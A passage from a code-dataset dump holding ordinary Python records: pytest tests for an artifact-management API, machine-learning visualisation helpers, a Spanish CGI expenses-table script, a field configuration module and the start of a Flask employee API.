"line_number": 383, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 398, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 404, "usage_type": "call"}, {"api_name": "pandas.rolling_std", "line_number": 404, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 419, "usage_type": "argument"}, {"api_name": "functools.wraps", "line_number": 417, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 430, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 435, "usage_type": "call"}, {"api_name": "pandas.stats.moments.rolling_max", "line_number": 440, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 440, "usage_type": "name"}, {"api_name": "pandas.stats.moments.rolling_min", "line_number": 445, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 445, "usage_type": "name"}, {"api_name": "pandas.stats.moments.ewma", "line_number": 451, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 451, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 466, "usage_type": "call"}, {"api_name": "pandas.stats.moments.rolling_apply", "line_number": 471, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 471, "usage_type": "name"}, {"api_name": "pandas.stats.moments.rolling_apply", "line_number": 472, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 472, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 474, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 492, "usage_type": "argument"}, {"api_name": "pandas.DataFrame", "line_number": 493, "usage_type": "call"}, {"api_name": "pandas.stats.moments.rolling_mean", "line_number": 498, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 498, "usage_type": "name"}, {"api_name": "pandas.stats.moments.rolling_mean", "line_number": 499, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 499, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 501, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 507, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 518, "usage_type": "argument"}, {"api_name": "pandas.stats.moments.rolling_mean", "line_number": 521, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 521, "usage_type": "name"}, {"api_name": "pandas.stats.moments.rolling_apply", "line_number": 522, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 522, "usage_type": "name"}, {"api_name": "numpy.fabs", "line_number": 522, "usage_type": "call"}, {"api_name": "pandas.stats.moments.rolling_sum", "line_number": 531, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 531, "usage_type": "name"}, {"api_name": "pandas.stats.moments.rolling_mean", "line_number": 540, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 540, "usage_type": "name"}, {"api_name": "pandas.stats.moments.rolling_mean", "line_number": 541, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 541, "usage_type": "name"}, {"api_name": "pandas.stats.moments.rolling_mean", "line_number": 542, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 542, "usage_type": "name"}, {"api_name": "pandas.stats.moments.rolling_mean", "line_number": 543, "usage_type": "call"}, {"api_name": "pandas.stats.moments", 
"line_number": 543, "usage_type": "name"}, {"api_name": "pandas.stats.moments.rolling_mean", "line_number": 546, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 546, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 548, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 558, "usage_type": "call"}, {"api_name": "pandas.stats.moments.rolling_sum", "line_number": 567, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 567, "usage_type": "name"}, {"api_name": "pandas.stats.moments.rolling_sum", "line_number": 568, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 568, "usage_type": "name"}, {"api_name": "pandas.stats.moments.rolling_sum", "line_number": 569, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 569, "usage_type": "name"}, {"api_name": "pandas.stats.moments.ewmstd", "line_number": 577, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 577, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 579, "usage_type": "call"}, {"api_name": "pandas.stats.moments.rolling_mean", "line_number": 584, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 584, "usage_type": "name"}, {"api_name": "pandas.stats.moments.rolling_std", "line_number": 585, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 585, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 590, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 594, "usage_type": "argument"}, {"api_name": "pandas.stats.moments.rolling_apply", "line_number": 600, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 600, "usage_type": "name"}, {"api_name": "pandas.Series", "line_number": 645, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 662, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 665, "usage_type": "call"}, {"api_name": "pandas.stats.moments.rolling_sum", "line_number": 679, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 679, "usage_type": "name"}, {"api_name": "numpy.abs", "line_number": 681, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 682, "usage_type": "call"}, {"api_name": "pandas.stats.moments.rolling_sum", "line_number": 684, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 684, "usage_type": "name"}, {"api_name": "pandas.stats.moments.rolling_sum", "line_number": 685, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 685, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 687, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 696, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 750, "usage_type": "call"}]} +{"seq_id": "22389621896", "text": "import datetime\n\nimport pytest\n\nfrom piperci_gman.artman import ArtMan\nfrom piperci_gman.orm.models import Artifact, Task, TaskEvent, db\n\n_artifacts = [\n {'uri': 'https://someminio.example.com/art1',\n 'sri': 'sha256-sCDaaxdshXhK4sA/v4dMHiMWhtGyQwA1fP8PgrN0O5g=',\n 'sri-urlsafe':\n 'c2hhMjU2LXNDRGFheGRzaFhoSzRzQS92NGRNSGlNV2h0R3lRd0ExZlA4UGdyTjBPNWc9',\n 'type': 'artifact',\n 'caller': 'pytest'},\n {'uri': 'https://someminio.example.com/art2',\n 'sri': 'sha256-jrT+J2yEC8wfUr6N/YxxbR/ux5y2GriIqXsySl5uVK8=',\n 'sri-urlsafe':\n 'c2hhMjU2LWpyVCtKMnlFQzh3ZlVyNk4vWXh4YlIvdXg1eTJHcmlJcVhzeVNsNXVWSzg9',\n 
'type': 'source',\n 'caller': 'pytest'},\n {'uri': 'https://someminio.example.com/art1',\n 'sri': 'sha256-sCDaaxdshXhK4sA/v4dMHiMWhtGyQwA1fP8PgrN0O5g=',\n 'sri-urlsafe':\n 'c2hhMjU2LXNDRGFheGRzaFhoSzRzQS92NGRNSGlNV2h0R3lRd0ExZlA4UGdyTjBPNWc9',\n 'type': 'artifact',\n 'caller': 'pytest',\n 'task_id': 'New'},\n ]\n\n\ndef formateach(data, values):\n i = 0\n for k, v in data.items():\n try:\n data[k] = v.format(values[i])\n i += 1\n except IndexError:\n raise ValueError('Ran out of values to fill dict')\n\n\n@pytest.fixture\ndef artifact(api, client, testtask):\n task = testtask()\n data = {'task_id': task.json['task']['task_id']}\n data.update(_artifacts[0])\n resp = client.post(api.url_for(ArtMan), json=data)\n return resp.json, data\n\n\n@pytest.fixture\ndef artifacts(api, client, testtask):\n task = testtask()\n arts = []\n\n for artifact in _artifacts:\n if 'task_id' in artifact and artifact['task_id'] == 'New':\n _task = testtask()\n else:\n _task = task\n\n data = {}\n data.update(artifact)\n data['task_id'] = _task.json['task']['task_id']\n\n resp = client.post(api.url_for(ArtMan), json=data)\n # assert resp.status_code == 200\n if resp.status_code != 200:\n pytest.fail(str(resp.json) + str(data))\n arts.append((resp,\n data))\n\n return arts\n\n\ndef test_get_artifact(api, client, artifacts):\n\n for artifact in artifacts:\n art_id = artifact[0].json['artifact_id']\n resp = client.get(f'/artifact/{art_id}')\n assert resp.status_code == 200\n\n\ndef test_get_artifact_bad_request(api, client):\n resp = client.get('/artifact')\n assert resp.status_code == 400\n\n\ndef test_get_bad_artifact(api, client, artifacts):\n resp = client.get(f'/artifact/31a122e8-9ba8-4f60-a9fb-490c66fd4b0a')\n assert resp.status_code == 404\n\n\ndef test_get_artifacts_by_task_id(api, client, artifact):\n task_id = artifact[0]['task']['task_id']\n\n resp = client.get(api.url_for(ArtMan, task_id=task_id))\n assert len(resp.json) == 1\n assert resp.json[0]['task']['task_id'] == task_id\n\n\ndef test_get_artifacts_by_bad_task_id(api, client, artifact):\n task_id = '31a122e8-9ba8-4f60-a9fb-490c66fd4b0a'\n\n resp = client.get(api.url_for(ArtMan, task_id=task_id))\n assert resp.status_code == 404\n\n\ndef test_get_artifact_by_bad_sri(api, client, artifact):\n bad_sri = 'c2hhMjU2LXZGYXRjZXlXYUU5QWtzM045b3VSVXRiYTFtd3JJSGRFVkx0aTg4YXRJdmM9'\n resp = client.get(f'/artifact/sri/{bad_sri}')\n assert resp.status_code == 404\n\n\ndef test_get_artifacts_by_sri(api, client, artifacts):\n resp = client.get(f'/artifact/sri/{artifacts[0][1][\"sri-urlsafe\"]}')\n assert resp.status_code == 200\n assert len(resp.json) == 2\n\n\ndef test_head_artifact_bad_request(api, client):\n resp = client.head('/artifact')\n assert resp.status_code == 400\n\n\ndef test_head_artifact(api, client, artifacts):\n\n for artifact in artifacts:\n art_id = artifact[0].json['artifact_id']\n resp = client.head(f'/artifact/{art_id}')\n assert resp.status_code == 200\n assert resp.headers['x-gman-artifact-status'] == 'unknown'\n\n\ndef test_head_bad_artifact(api, client, artifacts):\n\n resp = client.head(f'/artifact/31a122e8-9ba8-4f60-a9fb-490c66fd4b0a')\n assert resp.status_code == 404\n\n\ndef test_head_artifacts_by_sri(api, client, artifacts):\n resp = client.head(f'/artifact/sri/{artifacts[0][1][\"sri-urlsafe\"]}')\n assert resp.status_code == 200\n assert int(resp.headers['x-gman-artifacts']) == 2\n\n\ndef test_head_artifacts_for_task_id(api, client, artifact):\n task_id = artifact[0]['task']['task_id']\n\n resp = client.head(api.url_for(ArtMan, 
task_id=task_id))\n assert int(resp.headers['x-gman-artifacts']) == 1\n\n\ndef test_put_artifact(api, client):\n\n resp = client.put(api.url_for(ArtMan))\n\n assert resp.status_code == 405\n\n\ndef test_post_artifact_no_task(api, client):\n art = {'task_id': '7d394a53-6f45-4847-bfd1-105eef07dd08'}\n\n art.update(_artifacts[0])\n resp = client.post(api.url_for(ArtMan), json=art)\n\n assert resp.status_code == 404, 'Code failed to check that the task exists'\n assert 'errors' in resp.json, 'Missing expected errors response'\n assert 'task_id' in resp.json['errors'], (\n 'Did not throw the correct error for this test')\n\n\ndef test_post_bad_artifact_url(api, client):\n\n resp = client.post('/artifact/31a122e8-9ba8-4f60-a9fb-490c66fd4b0a')\n assert resp.status_code == 400\n\n\ndef test_post_same_artifact_twice(api, client, artifact):\n\n art = {'task_id': artifact[0]['task']['task_id']}\n art.update(_artifacts[0])\n\n resp = client.post(api.url_for(ArtMan), json=art)\n\n assert resp.status_code == 409\n\n\n@pytest.mark.parametrize('dissallowed', ('artifact_id', 'timestamp',\n 'status', 'event_id'))\ndef test_post_dissallowed_field(api, client, dissallowed):\n\n art = _artifacts[0].copy()\n art[dissallowed] = 'Some value'\n resp = client.post(api.url_for(ArtMan), json=art)\n assert resp.status_code == 422\n\n\ndef test_post_field_value_errors(api, client):\n\n art = _artifacts[0].copy()\n art['type'] = 'asdfasdfs'\n art['task_id'] = 1234\n resp = client.post(api.url_for(ArtMan), json=art)\n assert resp.status_code == 422\n\n\ndef test_raw_artifact_bad_hash(testtask):\n task_resp = testtask()\n task = Task().get(Task.task_id == task_resp.json['task']['task_id'])\n\n event = TaskEvent.create(task=task,\n message='testing creating an artifact',\n status='info',\n timestamp=datetime.datetime.now())\n with pytest.raises(ValueError):\n Artifact().create(\n task=task,\n event_id=event,\n type='log',\n status='unknown',\n sri='some non sri value',\n uri='https://www.example.com'\n )\n\n\ndef test_failed_artifact_create_no_table(api, client, monkeypatch, testtask):\n task = testtask()\n\n db.drop_tables([Artifact])\n\n art = {'task_id': task.json['task']['task_id']}\n art.update(_artifacts[0])\n\n resp = client.post(api.url_for(ArtMan), json=art)\n assert resp.status_code == 500\n\n\ndef test_failed_artifact_create_IDK(api, client, monkeypatch, testtask):\n task = testtask()\n\n def myfunc(*args, **kwargs):\n kwargs['uri'] = {'not a valid thing'}\n return None\n\n monkeypatch.setattr('piperci_gman.orm.models.Artifact.create', myfunc)\n\n art = {'task_id': task.json['task']['task_id']}\n art.update(_artifacts[0])\n\n resp = client.post(api.url_for(ArtMan), json=art)\n assert resp.status_code == 500\n", "repo_name": "dreamteamrepos/piperci-gman", "sub_path": "tests/test_artifact.py", "file_name": "test_artifact.py", "file_ext": "py", "file_size_in_byte": 7407, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "piperci_gman.artman.ArtMan", "line_number": 46, "usage_type": "argument"}, {"api_name": "pytest.fixture", "line_number": 41, "usage_type": "attribute"}, {"api_name": "piperci_gman.artman.ArtMan", "line_number": 65, "usage_type": "argument"}, {"api_name": "pytest.fail", "line_number": 68, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 50, "usage_type": "attribute"}, {"api_name": "piperci_gman.artman.ArtMan", "line_number": 96, "usage_type": "argument"}, {"api_name": "piperci_gman.artman.ArtMan", 
"line_number": 104, "usage_type": "argument"}, {"api_name": "piperci_gman.artman.ArtMan", "line_number": 149, "usage_type": "argument"}, {"api_name": "piperci_gman.artman.ArtMan", "line_number": 155, "usage_type": "argument"}, {"api_name": "piperci_gman.artman.ArtMan", "line_number": 164, "usage_type": "argument"}, {"api_name": "piperci_gman.artman.ArtMan", "line_number": 183, "usage_type": "argument"}, {"api_name": "piperci_gman.artman.ArtMan", "line_number": 194, "usage_type": "argument"}, {"api_name": "pytest.mark.parametrize", "line_number": 188, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 188, "usage_type": "attribute"}, {"api_name": "piperci_gman.artman.ArtMan", "line_number": 203, "usage_type": "argument"}, {"api_name": "piperci_gman.orm.models.Task", "line_number": 209, "usage_type": "call"}, {"api_name": "piperci_gman.orm.models.Task.task_id", "line_number": 209, "usage_type": "attribute"}, {"api_name": "piperci_gman.orm.models.TaskEvent.create", "line_number": 211, "usage_type": "call"}, {"api_name": "piperci_gman.orm.models.TaskEvent", "line_number": 211, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 214, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 214, "usage_type": "attribute"}, {"api_name": "pytest.raises", "line_number": 215, "usage_type": "call"}, {"api_name": "piperci_gman.orm.models.Artifact", "line_number": 216, "usage_type": "call"}, {"api_name": "piperci_gman.orm.models.db.drop_tables", "line_number": 229, "usage_type": "call"}, {"api_name": "piperci_gman.orm.models.db", "line_number": 229, "usage_type": "name"}, {"api_name": "piperci_gman.orm.models.Artifact", "line_number": 229, "usage_type": "name"}, {"api_name": "piperci_gman.artman.ArtMan", "line_number": 234, "usage_type": "argument"}, {"api_name": "piperci_gman.artman.ArtMan", "line_number": 250, "usage_type": "argument"}]} +{"seq_id": "35986754025", "text": "import matplotlib.pyplot as plt\nimport numpy as np\nimport umap\nfrom collections import defaultdict\nfrom sklearn.manifold import TSNE\nfrom sklearn.metrics import plot_confusion_matrix\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.inspection import permutation_importance\n\n\nCOLOR_DICT = {\n 0: \"blue\",\n 1: \"orange\",\n 2: \"green\",\n 3: \"red\",\n 4: \"purple\",\n 5: \"brown\",\n 6: \"olive\",\n 7: \"gray\",\n 8: \"pink\",\n 9: \"cyan\",\n 10: \"violet\",\n 11: \"magenta\",\n}\n\n\ndef train_visualize_random_forest(\n feature_matrix: np.array,\n labels: list,\n rf_estimators: int,\n rf_random_state: int = 42,\n) -> tuple:\n \"\"\" Trains and visualizes a random forest classifier.\n\n Notes:\n This isn't intended to be particularly flexible and and is more for demo purposes.\n\n Args:\n feature_matrix: (num_features x num_characters) matrix.\n labels: Ground-truth labels for the data set.\n rf_estimators: How many estimators should be used for the RF model?\n rf_random_state: Random state seed for reproducibility.\n\n Returns:\n A dictionary of character names and labels; also returns permutation_importances.\n \"\"\"\n\n # Create the train/test split.\n X_train, X_test, y_train, y_test = train_test_split(\n feature_matrix, labels, random_state=rf_random_state\n )\n\n # Extract the character names from the test set to look at individual results later.\n char_names = X_test[:, 0]\n\n # Delete the character names column before feeding into model.\n X_train = np.delete(X_train, obj=0, axis=1)\n 
X_test = np.delete(X_test, obj=0, axis=1)\n\n # Train the random forest model.\n rfc = RandomForestClassifier(\n n_estimators=rf_estimators, random_state=rf_random_state\n ).fit(X_train, y_train)\n\n # Build the return dictionary\n labels_by_character = {}\n predicted_labels = rfc.predict(X_test)\n for idx, char in enumerate(char_names):\n ground_truth = y_test[idx]\n predicted = predicted_labels[idx]\n labels_by_character[char] = {\n \"true_label\": ground_truth,\n \"predicted_label\": predicted,\n }\n\n # Do the actual plotting\n fig, ax = plt.subplots(figsize=(20, 20))\n plot_confusion_matrix(rfc, X_test, y_test, normalize=None, ax=ax)\n plt.show()\n\n # Get feature importances\n permutation_importances = permutation_importance(rfc, X_test, y_test, random_state=rf_random_state, n_jobs=2)\n sorted_idx = permutation_importances.importances_mean.argsort()\n\n # Finally, return the dictionary of labels.\n return labels_by_character, permutation_importances, sorted_idx\n\n\ndef visualize_clustering_results(cluster_points: list, labels: list) -> None:\n \"\"\" Visualizes and labels the clusters resulting from an analysis.\n\n Args:\n cluster_points: [(x1, y1), (x2, y2), ..., (xN, yN)]\n labels: Label for each of the points in cluster_points.\n \n \"\"\"\n\n # First, split out the point tuples by label.\n points_by_label = defaultdict(list)\n for idx, point in enumerate(cluster_points):\n points_by_label[labels[idx]].append(point)\n\n # Next, stack the points for each label into a single array.\n big_xy_list_by_label = {}\n for label, points_for_that_label in points_by_label.items():\n big_xy_list_by_label[label] = np.stack(tuple(points_for_that_label))\n\n # Compute the centroids of each point cloud for labeling.\n centroids_by_label = {}\n for label, arr in big_xy_list_by_label.items():\n length = arr.shape[0]\n sum_x = np.sum(arr[:, 0])\n sum_y = np.sum(arr[:, 1])\n centroid = sum_x / length, sum_y / length\n centroids_by_label[label] = centroid\n\n # Initialize a counter to iterate through the color map\n i = 0\n plt.rcParams.update({\"font.size\": 22, \"font.weight\": \"bold\"})\n fig, ax = plt.subplots(figsize=(20, 20))\n for label, coords in centroids_by_label.items():\n ax.scatter(\n big_xy_list_by_label[label][:, 0],\n big_xy_list_by_label[label][:, 1],\n c=COLOR_DICT[i],\n s=50,\n alpha=0.5,\n label=label,\n )\n # plt.scatter(coords[0], coords[1], c=color_dict[i], label=label, s=100, alpha=0)\n ax.annotate(label, xy=coords, textcoords=\"data\", color=\"black\")\n i += 1\n ax.legend(loc=\"best\")\n plt.show()\n\n\ndef tsne_points(feature_matrix: np.array, perplexity: int) -> list:\n \"\"\" Applies a t-SNE analysis and returns the character positions grouped by class.\n\n Notes:\n This isn't the cleanest, but I want parity with the way I analyze the UMAP data, so I\n chose the format to enable that. Because this is for plotting, I don't bother with more\n than 2 t-SNE dimensions (it's hard-coded), and I use 1000 iterations, which seems to offer\n well-converged results based on my testing. I use Manhattan distance for two reasons:\n\n 1. The data is riddled with outliers in the feature space.\n 2. The attribute features range from 0 - 20(ish) while the one-hot vectors are binary,\n and using Euclidean distance would weight the attributes too heavily.\n\n Args:\n feature_matrix: (num_features x num_characters) matrix.\n labels: Ground-truth labels for the data set.\n perplexity: Perplexity for the t-SNE model. 
N^(1/2) is a reasonable guess.\n\n Returns:\n A list of (x, y) tuples corresponding to the coordinates of each character in the embedding\n space.\n \n \"\"\"\n number_of_t_sne_components = 2\n number_of_t_sne_iterations = 1000\n t_sne_metric = \"manhattan\"\n\n tsne = TSNE(\n n_components=number_of_t_sne_components,\n perplexity=perplexity,\n n_iter=number_of_t_sne_iterations,\n metric=t_sne_metric,\n )\n results = tsne.fit_transform(feature_matrix)\n\n # This is where my hacky plotting script makes us do unseemly things.\n tsne_1 = results[:, 0]\n tsne_2 = results[:, 1]\n plottable_list_form = []\n for idx in range(len(tsne_1)):\n plottable_list_form.append((tsne_1[idx], tsne_2[idx]))\n\n return plottable_list_form\n\n\ndef umap_points(\n feature_matrix: np.array, umap_neighors: int = 200, min_dist: float = 0.1\n) -> list:\n \"\"\" As with the t-SNE method above, but with UMAP instead. \n \n Notes:\n The choice of n_neighbors is currently defaulted to 200, because that's roughly the\n number of members of each class. min_dist was based on some empirical tuning.\n \n \"\"\"\n mapper = umap.UMAP(n_neighbors=umap_neighors, min_dist=min_dist, metric=\"manhattan\")\n u = mapper.fit_transform(feature_matrix)\n return list(u)\n", "repo_name": "dchannah/dndmlpy", "sub_path": "dndmlpy/analysis_utils.py", "file_name": "analysis_utils.py", "file_ext": "py", "file_size_in_byte": 6750, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.array", "line_number": 29, "usage_type": "attribute"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 59, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestClassifier", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "sklearn.metrics.plot_confusion_matrix", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 80, "usage_type": "name"}, {"api_name": "sklearn.inspection.permutation_importance", "line_number": 83, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.rcParams.update", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 120, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 120, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 135, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 135, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 138, "usage_type": "attribute"}, {"api_name": "sklearn.manifold.TSNE", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 184, "usage_type": "attribute"}, 
{"api_name": "umap.UMAP", "line_number": 193, "usage_type": "call"}]} +{"seq_id": "36373414632", "text": "#!C:\\Python27\\python\nimport cgi\nimport cgitb; cgitb.enable()\nfrom controlador_gastos import * #conexion y funciones con la tabla gastos\nfrom controlador_categorias import * #conexion y funciones con la tabla categorias\n\nprint(\"Content-Type: text/html\\n\")\n\n#Parametros de la busqueda\nform = cgi.FieldStorage() \nsesion = form.getfirst('Sesion','empty')\nuser_id = form.getfirst('user_id','empty')\nfecha_inicial = form.getfirst('fecha_inicial','empty')\nfecha_final = form.getfirst('fecha_final','empty')\n\n#Encabezado generico\nprint(\"\"\"\n\t\n\t\n\tCGI script! Python\n\t\n\t\n\"\"\"\n)\n\n#Tabla de resultados\nprint (\"\"\"\n\t
\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\"\"\"\n)\n\n#Objeto controlador de la tabla gastos\ntabla_gastos = ControladorGastos()\n\n#Objeto controlador de la tabla categorias\ntabla_categorias = ControladorCategorias()\n\n#Cargamos la lista de categorias de gastos\ncategorias_disponibles = tabla_categorias.verCategorias()\nnombres_categorias = []\nkeys_categorias = []\nfor cursor_categorias in categorias_disponibles:\n\tcursor = cursor_categorias.fetchall()\n\tfor fila_categoria in cursor:\n\t\tkeys_categorias.append(fila_categoria[0])\n\t\tnombres_categorias.append(fila_categoria[1])\n\n#Buscamos los gastos del usuario\ndatos = tabla_gastos.verGastos(user_id,fecha_inicial,fecha_final)\n\ntotal = 0 #total de los gastos mostrados\nfila = 0 #fila de la tabla\n#Se imprime la tabla de resultados\nfor result in datos:\n\tresultado= result.fetchall()\n\tfor registro in resultado:\n\t\tprint('')\n\t\tprint('')\n\t\ttotal = total + float(registro[1]) #calculamos el total\n\t\t#Selector de categorias\n\t\tprint('')\n\t\tprint('')\n\t\t#Boton para borrar registro\n\t\tprint('')\n\t\t#Formulario para modificar registro\n\t\tprint('')\n\t\tprint('')\t\t\n\t\tfila = fila + 1\n\t\t\n#imprimimos\tel total de los gastos mostrados\t\nprint('\t')\n\t\t\nprint (\"\"\"\n\t
MontoCategoriaFechaDescripcion
')\n\t\tprint('')\n\t\tprint('')\n\t\tprint('')\n\t\tprint('')\n\t\tprint('
')\n\t\tprint('')\n\t\tprint('')\n\t\tprint('')\n\t\tprint('')\t\t\n\t\tprint('')\t\t\n\t\tprint('')\t\t\n\t\tprint('')\n\t\tprint('')\t\t\n\t\tprint('
Total: '+str(total)+'
\n\"\"\"\n)\n\n#Lee los campos de su formulario para la modificacion de registros\nprint (\"\"\"\n\n\"\"\"\n)\t", "repo_name": "stormvolt/SGPF", "sub_path": "sitio_web/tabla_gastos.py", "file_name": "tabla_gastos.py", "file_ext": "py", "file_size_in_byte": 4402, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "cgitb.enable", "line_number": 3, "usage_type": "call"}, {"api_name": "cgi.FieldStorage", "line_number": 10, "usage_type": "call"}]} +{"seq_id": "42800583313", "text": "from .utils import str_or_none\n\n\nclass SourceField:\n\n def __init__(\n self, source, source_field_name, field_description,\n is_title, is_facet, field_type, index_field):\n\n self.source = str_or_none(source)\n self.source_field_name = str_or_none(source_field_name)\n self.field_description = str_or_none(field_description)\n self.is_title = True if is_title != '' else False\n self.is_facet = True if is_facet != '' else False\n self.field_type = str_or_none(field_type)\n self.index_field = str_or_none(index_field)\n\n def __str__(self):\n\n fields = []\n for key in self.__dict__:\n fields.append(f'{key}={self.__dict__[key]}')\n\n return self.__class__.__name__ + '(' + ', '.join(fields) + ')'\n\n def __repr__(self):\n\n return self.__str__()\n\n\nclass IndexField:\n\n def __init__(self, index_field, field_type, is_facet):\n\n self.index_field = index_field\n\n if field_type.endswith('[]'):\n self.field_type = field_type.rstrip('[]')\n self.is_array = True\n else:\n self.field_type = field_type\n self.is_array = False\n\n self.is_facet = is_facet\n self.source_fields = []\n\n self._added = set()\n\n def add_source_field(self, source_field):\n\n self._ensure_right_type(source_field)\n self._ensure_not_duplicate(source_field)\n self._ensure_facet(source_field)\n\n self.source_fields.append(source_field)\n\n def _ensure_right_type(self, source_field):\n\n index_type = self.field_type\n if self.is_array:\n index_type += '[]'\n\n assert source_field.field_type == index_type, \\\n f'Index field type mismatch. 
{source_field} must be of type {self.field_type}'\n\n def _ensure_not_duplicate(self, source_field):\n\n key = source_field.source + source_field.source_field_name\n assert key not in self._added, f'Diplicate key: {key}'\n self._added.add(key)\n\n def _ensure_facet(self, source_field):\n '''Все поля источника данного поля индекса должны иметь одинаковое значение is_facet.\n Если есть различия, то надо создать несколько полей индекса\n '''\n assert source_field.is_facet == self.is_facet, \\\n f'IS_FACET mismatch: {source_field} has is_facet different from {self.is_facet}'\n\n def __str__(self):\n\n fields = []\n for key in self.__dict__:\n fields.append(f'{key}={self.__dict__[key]}')\n\n return self.__class__.__name__ + '(' + ', '.join(fields) + ')'\n\n def __repr__(self):\n\n return self.__str__()\n", "repo_name": "Sapunov/aisconfgen", "sub_path": "aisconfgen/fields.py", "file_name": "fields.py", "file_ext": "py", "file_size_in_byte": 2758, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "utils.str_or_none", "line_number": 10, "usage_type": "call"}, {"api_name": "utils.str_or_none", "line_number": 11, "usage_type": "call"}, {"api_name": "utils.str_or_none", "line_number": 12, "usage_type": "call"}, {"api_name": "utils.str_or_none", "line_number": 15, "usage_type": "call"}, {"api_name": "utils.str_or_none", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "30037749195", "text": "from datetime import datetime\nfrom flask import Flask, request\nfrom flask_restful import Resource, Api\nfrom sqlalchemy import create_engine\nfrom flask_jsonpify import jsonify\nfrom flask_cors import CORS\n\ndb_connect = create_engine('sqlite:///database/enterprise.db')\napp = Flask(__name__)\napi = Api(app)\ncor_app = CORS(app)\n\n\nclass Employee (Resource):\n\n @app.route('/employees', methods=['GET'])\n def get_all_employees():\n conn = db_connect.connect() # connect to database\n query = conn.execute(\"select * from employees\") # This line performs query and returns json result\n return {'employees': [i[0] for i in query.cursor.fetchall()]} # Fetches first column that is Employee ID\n\n @app.route('/employees/', methods=['GET'])\n def get_employee(employee_id):\n try:\n eid = int(employee_id)\n except Exception as e:\n return {\"error\": \"Invalid employee ID: {}\".format(e)}\n conn = db_connect.connect()\n 